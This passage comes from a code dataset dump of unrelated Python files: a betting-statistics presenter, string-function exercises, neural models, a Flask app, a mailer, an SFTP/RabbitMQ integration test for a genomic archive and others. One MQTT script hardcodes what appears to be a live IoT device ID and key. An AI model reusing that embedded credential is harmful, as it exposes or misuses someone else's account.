'.join([str((k, v)) for k, v in sorted(matchBet.eventsInfo[-1][1].items(),\n key=lambda x: '0' if x[0] == 'match' else x[0][0])])\n data.append([matchBet.dt, matchBet.eventsInfo[-1][0],\n matchBet.eventId, matchBet.compName, str(matchBet.extraInfo),\n names1, names2, matchBet.getLastScore(),\n info, matchBet.getKey()])\n return data\n\n def getBetsTable(self):\n data = []\n for mKey, matchBet in sorted(self.model.betsStorage.bets.items(), key=lambda x: x[1].dt, reverse=1):\n if mKey[0] != 'l':\n names1 = self.getPlayersIdsHrefs(matchBet.names[0], matchBet.ids[0])\n names2 = self.getPlayersIdsHrefs(matchBet.names[1], matchBet.ids[1])\n data.append([matchBet.dt, matchBet.eventsInfo[-1][0],\n matchBet.eventId, matchBet.compName, str(matchBet.extraInfo),\n names1, names2, matchBet.getLastScore(),\n mKey])\n return data\n\n def getMatchesTable(self, matches, filterFlag=False):\n data = []\n for i, match in enumerate(matches):\n names1 = self.getPlayersHrefsByIdsNames(match.ids[0], match.names[0], filterFlag=filterFlag)\n names2 = self.getPlayersHrefsByIdsNames(match.ids[1], match.names[1], filterFlag=filterFlag)\n flBet = '+' if match.hash in self.model.betsStorage.bets else ''\n data.append([match.date + ', ' + (match.time if match.time else '-'), self.getCompHref(match.compId, match.compName),\n names1, names2, match.setsScore + ', (' + match.pointsScore + ')',\n '; '.join([self.getSourceHref(e) for e in match.sources]), flBet, match.hash])\n return data\n\n def getMatchBetsTable(self, matchHash):\n data = []\n matchBet = self.model.betsStorage.getBet(matchHash)\n if matchBet is None:\n return data\n if matchHash[0] != 'l':\n left, right, step = 0, len(matchBet.eventsInfo), 1\n else:\n left, right, step = len(matchBet.eventsInfo)-1, -1, -1\n\n id1 = ' - '.join(matchBet.names[0])\n id2 = ' - '.join(matchBet.names[1])\n dt = matchBet.dt\n match = self.model.getMatch(matchHash)\n if match is not None:\n dt = min(dt, match.date + ' ' + (match.time if match.time else ''))\n for i in range(left, right, step):\n try:\n mb = matchBet.eventsInfo[i][1].get('match', dict())\n pWin = self.model.predict(matchBet, dt, score=mb.get('score', None), betInfo=mb)\n\n except Exception as ex:\n print(ex)\n print(matchBet.eventsInfo[i])\n raise\n\n data.append([matchBet.eventsInfo[i][0][:10] + ', ' + matchBet.eventsInfo[i][0][11:],\n matchBet.compName, id1, id2,\n mb.get('score', ''),\n str(mb.get('win1', '')) + str(pWin), mb.get('win2', ''),\n mb.get('total_g', [''])[0], mb.get('total_g', [''])[1:3], mb.get('total_l', [''])[1:3]])\n\n return data\n\n def getPlayersTable(self, players):\n data = []\n for player in players:\n href = player.hrefs.get('liga_pro', '')\n if href != '':\n href = '' + href + ''\n data.append([player.id,\n self.getHref(player.id, player.name),\n href,\n len(player.matches)])\n return data\n\n def getCompetitionsTable(self, competitions):\n data = []\n for comp in competitions:\n data.append([comp.finishDate, self.getCompHref0(comp.id, comp.name),\n str(len(comp.playersSet)), str(len(comp.matches)),\n '; '.join([self.getSourceHref(e) for e in comp.sources])])\n return data\n","sub_path":"ttstat/presenter.py","file_name":"presenter.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627145726","text":"# Без использования методов строк, напишите реализацию таких методов строк:\n# replace, split, find. 
Напишите функцию remove по индексу и по подстроке.\n\n\ndef remove_by_index(string, index):\n return string[:index] + string[index+1:]\n\n\ndef remove_by_substring(string, substring, maximum=0):\n return my_replace(string, substring, '', maximum)\n\n\ndef my_replace(string, old, new, maximum=0):\n len_string = len(string)\n x = 0\n result = ''\n max_counter = 0\n while x < len_string:\n if maximum and max_counter == maximum:\n result += string[x:]\n break\n y = my_find(string[x:], old)\n if y >= 0:\n result += string[x: y]\n result += new\n x += y\n x += len(old)\n else:\n result += string[x:]\n break\n max_counter += 1\n return result\n\n\ndef my_split(string, separator=' ', maximum=-1):\n result = []\n len_string = len(string)\n len_sep = len(separator)\n if len_string == 0:\n return None\n if maximum == 0:\n result.append(string)\n return result\n\n separators_array = []\n x = 0\n while x < len_string:\n if maximum > 0 and maximum == len(separators_array):\n separators_array.append(len_string)\n break\n y = my_find(string[x:], separator)\n if y >= 0:\n x += y\n separators_array.append(x)\n x += len_sep\n\n else:\n separators_array.append(len_string)\n break\n\n for i in range(len(separators_array) - 1):\n if i == 0:\n result.append(string[:separators_array[i]])\n combo = string[separators_array[i] + len_sep: separators_array[i + 1]]\n result.append(combo)\n return result\n\n\ndef my_find(string, value, start=0, end=0):\n string_counter = 0\n end, start = max(start, end), min(start, end)\n if start and start <= len(string):\n string = string[:start]\n if end and (end - start) <= len(string):\n string = string[end - start:]\n len_string = len(string)\n len_value = len(value)\n if len_value > len_string:\n return -1\n while string_counter <= len_string - len_value:\n if string[string_counter:string_counter + len_value] == value:\n return string_counter\n string_counter += 1\n return -1\n\n\nif __name__ == \"__main__\":\n my_string = 'pip is a Python package installer, recommended ' \\\n 'for installing Python packages which are not available '\n print(my_split(my_string))\n print(my_replace(my_string, 'Python', 'PYTHON'))\n print(remove_by_index(my_string, 4))\n print(remove_by_substring(my_string, 'Python'))\n","sub_path":"lesson_4/replace_find_split.py","file_name":"replace_find_split.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"209530132","text":"import torch, torch.nn as nn\nimport torch.nn.functional as F\n\nfrom fastai.core import V\n\ndef create_emb(vecs, itos, em_sz):\n emb = nn.Embedding(len(itos), em_sz, padding_idx=1)\n wgts = emb.weight.data\n miss = []\n #itos = ID of a token to token name\n for i,w in enumerate(itos):\n try: wgts[i] = torch.from_numpy(vecs[w]*3)\n except: miss.append(w)\n #count how many token's embeddings where missed \n print(len(miss),miss[5:10])\n return emb\n\nclass Seq2SeqRNN_Bidir(nn.Module):\n def __init__(self, vecs_enc, itos_enc, em_sz_enc, vecs_dec, itos_dec, em_sz_dec, nh, out_sl, nl=2):\n super().__init__()\n #vecs_enc = enconding vector\n #itos_enc = for conversion of tokens Id in encoder to their corresponding word\n #em_sz_enc = embedding size of the encoder\n #vecs_dec = decoders vector\n #itos_dec = for conversion of tokens Id in decoder to their corresponding word\n #em_sz_dec = embedding size of the decoder\n #nh = number of hidden layer\n #out_sl = length of longest method name\n #nl = number of inner layer\n self.emb_enc = 
create_emb(vecs_enc, itos_enc, em_sz_enc)\n self.nl, self.nh, self.out_sl = nl, nh, out_sl\n #setting bidirectional = true\n self.gru_enc = nn.GRU(em_sz_enc, nh, num_layers=nl, dropout=0.25, bidirectional=True)\n self.out_enc = nn.Linear(nh * 2, em_sz_dec, bias=False)\n self.drop_enc = nn.Dropout(0.05)\n self.emb_dec = create_emb(vecs_dec, itos_dec, em_sz_dec)\n self.gru_dec = nn.GRU(em_sz_dec, em_sz_dec, num_layers=nl, dropout=0.1)\n self.emb_enc_drop = nn.Dropout(0.15)\n self.out_drop = nn.Dropout(0.35)\n self.out = nn.Linear(em_sz_dec, len(itos_dec))\n self.out.weight.data = self.emb_dec.weight.data\n\n def forward(self, inp):\n sl, bs = inp.size()\n #sl= sequence length, bs= batch size\n h = self.initHidden(bs)\n emb = self.emb_enc_drop(self.emb_enc(inp))\n enc_out, h = self.gru_enc(emb, h)\n h = h.view(2, 2, bs, -1).permute(0, 2, 1, 3).contiguous().view(2, bs, -1)\n h = self.out_enc(self.drop_enc(h))\n # h = hidden state obtained from the encoder\n dec_inp = V(torch.zeros(bs).long())\n res = []\n #decoder impl\n for i in range(self.out_sl):\n emb = self.emb_dec(dec_inp).unsqueeze(0)\n outp, h = self.gru_dec(emb, h)\n outp = self.out(self.out_drop(outp[0]))\n res.append(outp)\n dec_inp = V(outp.data.max(1)[1])\n if (dec_inp == 1).all(): break\n return torch.stack(res)\n\n def initHidden(self, bs):\n return V(torch.zeros(self.nl * 2, bs, self.nh))","sub_path":"Seq2SeqRNN_Bidirectional.py","file_name":"Seq2SeqRNN_Bidirectional.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"207303823","text":"from websocket import create_connection\n\n\ndef test():\n ws = create_connection(\"ws://echo.websocket.org/\")\n print(\"Sending 'Hello, World'...\")\n ws.send(\"Hello, World\")\n print(\"Sent\")\n print(\"Receiving...\")\n result = ws.recv()\n print(\"Received '%s'\" % result)\n ws.close()\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"src/websocket/demo/websocketdemo.py","file_name":"websocketdemo.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"640530858","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: D:\\dev\\cocos2020\\test\\test_draw.py\n# Compiled at: 2020-01-10 23:58:31\n# Size of source mod 2**32: 1306 bytes\nfrom __future__ import division, print_function, unicode_literals\nimport sys, os\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))\ntestinfo = 't 0.1, s, q'\ntags = 'Canvas, line_to'\nimport cocos\nimport cocos.director as director\nfrom cocos import draw\nimport pyglet, random\nri = random.randint\n\nclass TestFigure(draw.Canvas):\n\n def render(self):\n x, y = director.get_window_size()\n for i in range(100):\n start = (\n ri(0, 640), ri(0, 480))\n end = (ri(0, 640), ri(0, 480))\n color = (ri(0, 255), ri(0, 255), ri(0, 255), ri(0, 255))\n width = ri(1, 20)\n if random.random() < 0.3:\n self.set_color(color)\n self.set_stroke_width(width)\n self.move_to(start)\n self.line_to(end)\n\n\nclass TestLayer(cocos.layer.Layer):\n\n def __init__(self):\n super(TestLayer, self).__init__()\n self.add(TestFigure())\n self.schedule(lambda x: 0)\n\n\ndef main():\n director.init()\n test_layer = TestLayer()\n main_scene = cocos.scene.Scene(test_layer)\n director.run(main_scene)\n\n\nif __name__ == '__main__':\n 
main()","sub_path":"pycfiles/cocos2d-0.6.8.tar/test_draw.cpython-38.py","file_name":"test_draw.cpython-38.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"499095825","text":"from willow.willow import *\n\ndef session(me):\n add(\"
Please enter your name.\")\n    add(\"\")\n    add(\"\")\n    take({\"tag\": \"click\", \"id\": \"go\", \"client\": me})\n    name = peek(\"#name\")\n    add(\"
Hello, %s.\" % name)\n\nrun(session) \n","sub_path":"lesson05.py","file_name":"lesson05.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"107449743","text":"from enum import IntEnum\nimport itertools as it\n\nclass BetEnded(Exception): pass\nclass LastPlayerLeft(Exception): pass\n\nclass Move(IntEnum):\n BLIND = 0\n FOLD = 2\n CHECK = 3\n BET = 4\n CALL = 5\n RAISE = 6\n QUIT = 7\n\nclass CommunityData:\n def __init__(self, limit :int) -> None:\n self.communityCards = []\n self.limit = limit\n self.actions = [[]]\n self.maxPot = 0\n \n def getNumOfBlinds(self) -> int: #tuple 'cause its faster than list()\n return len(tuple(filter(lambda x: x[1] == Move.BLIND, self.actions[0])))\n\nclass BetQueue:\n def __init__(self, limit :int, players :list) -> None:\n self.__initAfterFoldAndCommData(limit)\n self.waiting = players #players who do not bet yet\n\n def __initAfterFoldAndCommData(self, limit):\n self.communityData = CommunityData(limit)\n self.after = [] #players who are after their bets\n self.fold = [] #players who folded\n\n def reset(self, limit :int):\n self.waiting.extend(self.after + self.fold)\n self.__initAfterFoldAndCommData(limit)\n for player in self.waiting:\n idx = player.dealerIdx - 1\n player.dealerIdx = idx if idx > -1 else len(self.waiting) - 1\n player.clearHandAndPot()\n\n self.waiting.sort(key=lambda x: x.dealerIdx)\n\n def blindLoop(self) -> None:\n self.__loop(lambda x, y : y.getNumOfBlinds() < 2)\n\n def betLoop(self) -> None:\n self.__loop(lambda x, y: len(x) > 0)\n\n self.waiting.extend(self.after)\n self.waiting.sort(key=lambda x: x.dealerIdx)\n self.after.clear()\n self.communityData.actions.append([])\n\n def extendCommCards(self, cards):\n self.communityData.communityCards.extend(cards)\n\n def getBankroll(self):\n return sum(map(lambda x: x[2], list(it.chain(*self.communityData.actions))))\n\n def __loop(self, statement) -> None:\n while statement(self.waiting, self.communityData):\n player = self.waiting.pop(0)\n move = player.bet(self.communityData)\n \n if move in [Move.RAISE, Move.BET, Move.BLIND]: #raising moves\n self.waiting.extend(self.after)\n self.after = [player]\n self.communityData.maxPot = player.inPot\n elif move == Move.FOLD:\n self.fold.append(player)\n elif move != Move.QUIT:\n self.after.append(player)\n \n if len(self.allPlayers()) < 2: raise LastPlayerLeft()\n if len(self.getNonFoldingPlayers()) < 2:raise BetEnded()\n\n def getCommCards(self): return self.communityData.communityCards\n def allPlayers(self): return self.waiting + self.after + self.fold\n def getNonFoldingPlayers(self) -> list: return self.waiting + self.after","sub_path":"pyker/betQueue.py","file_name":"betQueue.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"634141273","text":"# *********************************************************************\n# Version: 2016.09.06\n# Author: Archer Huang\n# License: MIT\n# Description: Linkit Smart 7688 Duo + Arduino Code + Bridge + MCS\n# *********************************************************************\n# \n# 1. update opkg & install wget & disable bridge\n# \t opkg update\n# \t opkg install wget\n# \t uci set yunbridge.config.disabled=0\n# \t uci commit\n#\n# 2. 
install httplib\n#\t pip install paho-mqtt\n#\n# *********************************************************************\n\nimport paho.mqtt.client as mqtt\nimport re\nimport httplib, urllib\nimport socket\nimport sys\nimport time\n\ndeviceId = \"D7fDOASh\"\ndeviceKey = \"eqGDzbxWsKyJqkl7\"\nMQTT_SERVER = \"mqtt.mcs.mediatek.com\"\nMQTT_PORT = 1883\nMQTT_ALIVE = 60\nMQTT_TOPIC = \"mcs/\" + deviceId + \"/\" + deviceKey + \"/+\"\n\ndef on_connect(client, userdata, flags, rc):\n print(\"MQTT Connected with result code \"+str(rc))\n client.subscribe(MQTT_TOPIC)\n\ndef on_message(client, userdata, msg):\n print(\"mqtt payload=%s\" %(msg.payload))\n\nmqtt_client = mqtt.Client()\nmqtt_client.on_connect = on_connect\nmqtt_client.on_message = on_message\n\nmqtt_client.connect(MQTT_SERVER, MQTT_PORT, MQTT_ALIVE)\nmqtt_client.loop_forever()","sub_path":"Python/get_data_from_mcs_mqtt.py","file_name":"get_data_from_mcs_mqtt.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"76714189","text":"import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n\nclass Mailer:\n def __init__(self, config):\n self.fromaddr = config.fromaddr #'no.place.like.co@gmail.com'\n self.toaddr = config.toaddr #'shravan007.c@gmail.com'\n self.msg = MIMEMultipart()\n self.msg['From'] = self.fromaddr\n self.msg['To'] = self.toaddr\n self.msg['Subject'] = 'EZ Living Report'\n self.body = 'Sample Body'\n\n self.filename = config.report_file.split('/')[-1]\n self.filepath = config.report_file\n self.emails = config.emails\n\n attachment = open(self.filepath, 'rb')\n\n self.p = MIMEBase('application', 'octet-stream')\n self.p.set_payload((attachment).read())\n encoders.encode_base64(self.p)\n\n self.p.add_header('Content-Disposition', f\"attachment; filename= {self.filename.split('/')[-1]}\")\n\n self.msg.attach(self.p)\n\n self.s = smtplib.SMTP('smtp.gmail.com', 587)\n\n self.s.starttls()\n self.s.login(self.fromaddr, config.password)\n\n self.text = self.msg.as_string()\n\n\n def deliver(self):\n\n for email in self.emails:\n self.s.sendmail(self.fromaddr, email, self.text)\n\n\n #self.s.sendmail(self.fromaddr, self.toaddr, self.text)\n #self.s.quit()\n\n","sub_path":"cronjob/lib/mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"104472819","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('infile')\nargs = parser.parse_args()\n\n\ndef sheep(n): \n d = {}\n unseen = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\n i = 1\n while True:\n N = str(n * i)\n for u in unseen[:]:\n if u in N:\n unseen.remove(u)\n if unseen == []:\n return i * n\n else:\n i += 1\n\n\nwith open(args.infile, 'r') as infile:\n infile.readline()\n j = 1\n for line in infile:\n n = int(line)\n if n == 0:\n answer = \"INSOMNIA\"\n else:\n answer = sheep(n)\n print(\"Case #%s: %s\" % (j, answer))\n j += 1\n","sub_path":"solutions_5652388522229760_1/Python/gearfo/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"376234410","text":"# coding:utf-8\nimport fileinput\nimport csv\nimport sys\n\n\ndef is_insert_statement(line):\n return line.startswith('INSERT INTO') or 
False\n\n\ndef parse_values(line):\n values = line.partition('` VALUES ')[2][1:-3].split('),(')\n if len(values) == 0:\n return\n\n reader = csv.reader(\n values,\n delimiter=',',\n doublequote=False,\n escapechar='\\\\',\n quotechar=\"'\",\n strict=True)\n for row in reader:\n if len(row) == 0:\n continue\n sys.stdout.write('\\t'.join(row) + '\\n')\n\n\nif __name__ == '__main__':\n try:\n for line in fileinput.input():\n if is_insert_statement(line):\n parse_values(line)\n except KeyboardInterrupt:\n sys.exit(0)\n","sub_path":"dump2tsv.py","file_name":"dump2tsv.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"548269610","text":"from transformers import RobertaModel\nimport torch\nfrom torch import nn\nfrom regr.program.model.primaldual import PrimalDualModel\n\nclass WIQA_Robert(nn.Module):\n\n def __init__(self):\n super(WIQA_Robert, self).__init__()\n self.bert = RobertaModel.from_pretrained('roberta-base')\n self.last_layer_size = self.bert.config.hidden_size\n\n def forward(self, input_ids,attention_mask):\n last_hidden_state, pooled_output = self.bert(input_ids=input_ids,attention_mask=attention_mask,return_dict=False)\n return last_hidden_state[:,0]\n\nclass RobertaClassificationHead(nn.Module):\n\n def __init__(self,last_layer_size):\n super(RobertaClassificationHead, self).__init__()\n self.dense = nn.Linear(last_layer_size, last_layer_size)\n self.dropout = nn.Dropout(0.2)\n self.out_proj = nn.Linear(last_layer_size, 2)\n\n def forward(self, x):\n x = self.dropout(x)\n x = self.dense(x)\n x = torch.tanh(x)\n x = self.dropout(x)\n x = self.out_proj(x)\n return x\n\nclass WIQAModel(PrimalDualModel):\n def __init__(self, graph, poi, loss, metric):\n super().__init__(\n graph,\n poi=poi,\n loss=loss,\n metric=metric)\n","sub_path":"examples/WIQA/WIQA_models.py","file_name":"WIQA_models.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"383421729","text":"import os\n\nfrom sqlalchemy import event\n\nfrom flask import Flask\nfrom flask.ext.login import current_user\nfrom flask.ext.principal import identity_loaded, UserNeed, RoleNeed\n\nfrom .models import db, Reminder, User, Role, Post, Comment, Tag\nfrom .extensions import (\n bcrypt,\n oid,\n login_manager,\n principals,\n rest_api,\n celery,\n debug_toolbar,\n cache,\n assets_env,\n main_js,\n main_css,\n admin,\n mail\n)\nfrom .controllers.main import main_blueprint\nfrom .controllers.blog import blog_blueprint\nfrom .controllers.rest.auth import AuthApi\nfrom .controllers.rest.post import PostApi\nfrom .controllers.admin import (\n CustomView,\n CustomModelView,\n CustomFileAdmin,\n PostView\n)\nfrom .tasks import on_reminder_save\n\n\ndef create_app(object_name):\n \"\"\"\n An flask application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n Arguments:\n object_name: the python path of the config object,\n e.g. 
project.config.ProdConfig\n \"\"\"\n\n app = Flask(__name__)\n app.config.from_object(object_name)\n\n db.init_app(app)\n event.listen(Reminder, 'after_insert', on_reminder_save)\n\n bcrypt.init_app(app)\n oid.init_app(app)\n login_manager.init_app(app)\n principals.init_app(app)\n celery.init_app(app)\n debug_toolbar.init_app(app)\n cache.init_app(app)\n assets_env.init_app(app)\n admin.init_app(app)\n mail.init_app(app)\n\n assets_env.register(\"main_js\", main_js)\n assets_env.register(\"main_css\", main_css)\n\n admin.add_view(CustomView(name='Custom'))\n admin.add_view(\n CustomModelView(\n User, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Role, db.session, category='Models'\n )\n )\n admin.add_view(\n PostView(\n Post, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Comment, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Tag, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Reminder, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomFileAdmin(\n os.path.join(os.path.dirname(__file__), 'static'),\n '/static/',\n name='Static Files'\n )\n )\n\n rest_api.add_resource(\n AuthApi,\n '/api/auth'\n )\n rest_api.add_resource(\n PostApi,\n '/api/post',\n '/api/post/'\n )\n rest_api.init_app(app)\n\n @identity_loaded.connect_via(app)\n def on_identity_loaded(sender, identity):\n # Set the identity user object\n identity.user = current_user\n\n # Add the UserNeed to the identity\n if hasattr(current_user, 'id'):\n identity.provides.add(UserNeed(current_user.id))\n\n # Add each role to the identity\n if hasattr(current_user, 'roles'):\n for role in current_user.roles:\n identity.provides.add(RoleNeed(role.name))\n\n app.register_blueprint(main_blueprint)\n app.register_blueprint(blog_blueprint)\n\n return app\n","sub_path":"Chapter 13_Code/Chapter 13/webapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"48751634","text":"import paramiko\nimport os\nimport pika\nimport secrets\nfrom hashlib import md5\nimport json\nimport string\nimport uuid\nimport logging\nfrom legacryptor.crypt4gh import encrypt\nimport pgpy\nimport argparse\nfrom base64 import b64decode\nfrom minio import Minio\nfrom kubernetes import client, config\nfrom kubernetes.client.rest import ApiException\nfrom time import sleep\n\n\nconfig.load_kube_config()\napi_core = client.CoreV1Api()\n\n\nFORMAT = '[%(asctime)s][%(name)s][%(process)d %(processName)s][%(levelname)-8s] (L:%(lineno)s) %(funcName)s: %(message)s'\nlogging.basicConfig(format=FORMAT, datefmt='%Y-%m-%d %H:%M:%S')\nLOG = logging.getLogger(__name__)\nLOG.setLevel(logging.INFO)\n\n\ndef open_ssh_connection(hostname, user, key_path, key_pass='password', port=2222):\n \"\"\"Open an ssh connection, test function.\"\"\"\n try:\n client = paramiko.SSHClient()\n k = paramiko.RSAKey.from_private_key_file(key_path, password=key_pass)\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(hostname, allow_agent=False, look_for_keys=False, port=port, timeout=0.3, username=user, pkey=k)\n LOG.info(f'ssh connected to {hostname}:{port} with {user}')\n except paramiko.BadHostKeyException as e:\n LOG.error(f'Something went wrong {e}')\n raise Exception('BadHostKeyException on ' + hostname)\n except paramiko.AuthenticationException as e:\n LOG.error(f'Something went wrong {e}')\n raise 
Exception('AuthenticationException on ' + hostname)\n except paramiko.SSHException as e:\n LOG.error(f'Something went wrong {e}')\n raise Exception('SSHException on ' + hostname)\n\n return client\n\n\ndef sftp_upload(hostname, user, file_path, key_path, key_pass='password', port=2222):\n \"\"\"SFTP Client file upload.\"\"\"\n try:\n k = paramiko.RSAKey.from_private_key_file(key_path, password=key_pass)\n transport = paramiko.Transport((hostname, port))\n transport.connect(username=user, pkey=k)\n LOG.info(f'sftp connected to {hostname}:{port} with {user}')\n sftp = paramiko.SFTPClient.from_transport(transport)\n filename, _ = os.path.splitext(file_path)\n sftp.put(file_path, f'{filename}.c4ga')\n LOG.info(f'file uploaded {filename}.c4ga')\n except Exception as e:\n LOG.error(f'Something went wrong {e}')\n raise e\n finally:\n LOG.debug('sftp done')\n transport.close()\n\n\ndef submit_cega(address, message, routing_key, port=5672, file_md5=None):\n \"\"\"Submit message to CEGA along with.\"\"\"\n # Determine credentials\n mq_password = b64decode(read_secret('cega-connection').to_dict()['data']['address']).decode('utf-8')[12:44]\n mq_address = f'amqp://lega:{mq_password}@{address}:{port}/lega'\n try:\n parameters = pika.URLParameters(mq_address)\n connection = pika.BlockingConnection(parameters)\n channel = connection.channel()\n channel.basic_publish(exchange='localega.v1', routing_key=routing_key,\n body=json.dumps(message),\n properties=pika.BasicProperties(correlation_id=str(uuid.uuid4()),\n content_type='application/json',\n delivery_mode=2))\n\n connection.close()\n LOG.info('Message published to CentralEGA')\n except Exception as e:\n LOG.error(f'Something went wrong {e}')\n raise e\n\n\ndef encrypt_file(file_path, pubkey):\n \"\"\"Encrypt file and extract its md5.\"\"\"\n file_size = os.path.getsize(file_path)\n filename, _ = os.path.splitext(file_path)\n output_base = os.path.basename(filename)\n c4ga_md5 = None\n output_file = os.path.expanduser(f'{output_base}.c4ga')\n\n try:\n encrypt(pubkey, open(file_path, 'rb'), file_size, open(f'{output_base}.c4ga', 'wb'))\n with open(output_file, 'rb') as read_file:\n c4ga_md5 = md5(read_file.read()).hexdigest()\n LOG.info(f'File {output_base}.c4ga is the encrypted file with md5: {c4ga_md5}.')\n except Exception as e:\n LOG.error(f'Something went wrong {e}')\n raise e\n return (output_file, c4ga_md5)\n\n\ndef read_secret(name):\n \"\"\"Read secret.\"\"\"\n api_response = ''\n try:\n api_response = api_core.read_namespaced_secret(name, \"testing\", exact=True, export=True)\n LOG.info(f'S3 connection parameters: {name} read.')\n except ApiException as e:\n LOG.error(f'Exception message: {e}')\n else:\n return api_response\n\n\ndef list_s3_objects(minio_address, bucket_name, region_name):\n \"\"\"Check if there is a file inside s3.\"\"\"\n s3_keys = read_secret('s3-keys')\n access = b64decode(s3_keys.to_dict()['data']['access']).decode('utf-8')\n secret = b64decode(s3_keys.to_dict()['data']['secret']).decode('utf-8')\n\n minioClient = Minio(minio_address, access_key=access, secret_key=secret,\n region=region_name, secure=False)\n LOG.info(f'Connected to S3: {minio_address}.')\n # List all object paths in bucket that begin with my-prefixname.\n objects = minioClient.list_objects_v2(bucket_name, recursive=True)\n for obj in objects:\n assert obj.object_name == '1', f\"Wrong file! 
This is the file you are looking: {obj.object_name.encode('utf-8')}\"\n LOG.info(f'Found ingested file: {obj.object_name} of size: {obj.size}.')\n\n\ndef main():\n \"\"\"Do the sparkles and fireworks.\"\"\"\n parser = argparse.ArgumentParser(description=\"Encrypting, uploading to inbox and sending message to CEGA.\")\n\n parser.add_argument('input', help='Input file to be encrypted.')\n parser.add_argument('--u', help='Username to identify the elixir.', default='ega-box-999')\n parser.add_argument('--uk', help='User secret private RSA key.', default='auto/config/user.key')\n parser.add_argument('--pk', help='Public key file to encrypt file.', default='auto/config/key.1.pub')\n parser.add_argument('--inbox', help='Inbox address, or service name', default='inbox.lega.svc')\n parser.add_argument('--inbox-port', help='Inbox address, or service name', default='inbox.lega.svc')\n parser.add_argument('--s3', help='Inbox address, or service name', default='s3.lega.svc')\n parser.add_argument('--cm', help='CEGA MQ broker IP/name address')\n parser.add_argument('--cm-port', help='Inbox address, or service name')\n\n args = parser.parse_args()\n\n used_file = os.path.expanduser(args.input)\n key_pk = os.path.expanduser(args.uk)\n pub_key, _ = pgpy.PGPKey.from_file(os.path.expanduser(args.pk))\n\n inbox_host = args.inbox\n test_user = args.u\n test_file, c4ga_md5 = encrypt_file(used_file, pub_key)\n stableID = ''.join(secrets.choice(string.digits) for i in range(16))\n fileID = 1 # Harcoded for now\n if c4ga_md5:\n sftp_upload(inbox_host, test_user, test_file, key_pk, port=int(args.inbox_port))\n submit_cega(args.cm, {'user': test_user, 'filepath': test_file}, 'files', port=args.cm_port)\n submit_cega(args.cm, {'file_id': fileID, 'stable_id': f'EGAF{stableID}'}, 'files.stableIDs', port=args.cm_port)\n sleep(10) # wait for the file\n list_s3_objects(args.s3, 'lega', 'lega')\n LOG.info('Should be all!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test/sftp.py","file_name":"sftp.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"306383739","text":"import pandas\r\n\r\ndata = {\r\n \"FirstName\": [\"Satvik\",\"Avinash\",\"Lahri\"] ,\r\n \"LastName\": [\"Shah\",\"Kati\",\"Rath\"],\r\n \"Email\": [\"satshah@example.com\", \"avinashk@example.com\",\"lahri.rath@example.com\"],\r\n \"PhoneNumber\": [4537829158, 5892184058, 4528727830]\r\n}\r\n\r\ntable = pandas.DataFrame(data)\r\ntable.to_excel(\"sameplexls.xlsx\")\r\n\r\n","sub_path":"Python/Activities/Activity19.py","file_name":"Activity19.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"327393269","text":"import numpy as np\n\nfrom lumicks.pylake.fdcurve import FDCurve\nfrom lumicks.pylake.channel import Slice, TimeSeries\n\n\ndef make_mock_fd(force, distance, start=0):\n \"\"\"Mock FD curve which is not attached to an actual file, timestamps start at `start`\"\"\"\n assert len(force) == len(distance)\n fd = FDCurve(file=None, start=None, stop=None, name=\"\")\n timestamps = np.arange(len(force)) + start\n fd._force_cache = Slice(TimeSeries(force, timestamps))\n fd._distance_cache = Slice(TimeSeries(distance, timestamps))\n return fd\n\n\ndef test_subtraction():\n 